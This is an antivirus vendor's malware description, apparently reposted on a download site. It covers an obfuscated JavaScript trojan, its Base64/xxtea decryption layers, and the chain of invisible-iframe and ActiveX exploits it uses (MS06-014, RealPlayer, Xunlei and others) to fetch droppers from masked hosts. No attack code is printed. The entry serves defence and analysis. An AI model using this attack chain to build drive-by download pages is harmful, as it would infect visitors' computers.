Your essential free software toolbox

SHARE
THIS ON

Trojan.Exploit.JS.RealPlr.S

MEDIUM

aprox. 35 kb

()

Symptoms

The malicious script doesn't have any obvious symptoms.

Removal instructions:

Please let BitDefender disinfect your files.

Analyzed By

Daniel Chipiristeanu, virus researcher

Technical Description:

The malicious script written in JavaScript just puts on new layers of encryption over the well known recent exploits described in other malware like Exploit.SinaDloader.B, as we'll see later on.

First let's describe this protection layer that the script uses. Basically it has a variable that holds the encrypted string, which, after decryption, is written in the html using the "document.write" feature. It takes three steps until decoding the specific malicious javascript code as the string is encrypted with a) Base64 encoding b) xxtea encryption arithmetic algorithm c) conversion from UTF-8 to UTF-16.

After decryption, different versions have distinct actions. As this type of encryption is spread on malicious sites, the following actions are taken from a version involved in Trojan.Exploit.SSX infection campaign, which can help the user understand the effect of the malware on the affected computer.

The preferred vulnerability is still the "invisible iframe" attack.

    * Creates two invisible iframes. The first points to an exploit for the Snapshot Viewer described here and the second downloads some SWF (Adobe Flash extension) files that are detected as Exploit.SWF.Gen

    * If the "User Agent" is msie7 (Internet Explorer) it creates an invisible iframe [malicious_site].cn/a2/ms06014.htm which uses MS06-014 - RDS.DataControl exploit in Microsoft Data Access Component and downloads a file detected as Trojan.Dropper.Replacer.A.

    * Lianzhong chat room (GLIEDown.IEDown.1) exploit in the found in [malicious_site].cna2/GLWORLD.html (detected as Trojan.Exploit.JS.G) which downloads [malicious_site].cn/new/a4.css (Trojan.Dropper.Replacer.A).

    * [malicious_site].cn/sina.htm (DownloadAndInstalll exploit) that downloads [malicious_site].cn/down/sina.exe (heuristicaly detected as Generic.Malware.SYBdld.1FBF30D9).

    * UUUpgrade ActiveX Control module--update exploit (UUUPGRADE.UUUpgradeCtrl.1 component) which downloads [malicious_site].cn/UU.htm (unavailable at analysis time)

    * Xunlei Thunder exploit (ActiveXObject DPClient.Vod) found in [malicious_site].cn/a2/Thunder.html downloading [malicious_site].cn/down/ko.css ( detected as Trojan.Dropper.Replacer.A)

    * RealPlayer exploit ( IERPCtl.IERPCtl.1 component ) for versions older than "6.0.14.552" which finally downloads [malicious_site].cn/down/ko.css ( detected as Trojan.Dropper.Replacer.A) .

* malicious_site is an umbrella term for websites hosting malware and can both differ and change in various examples.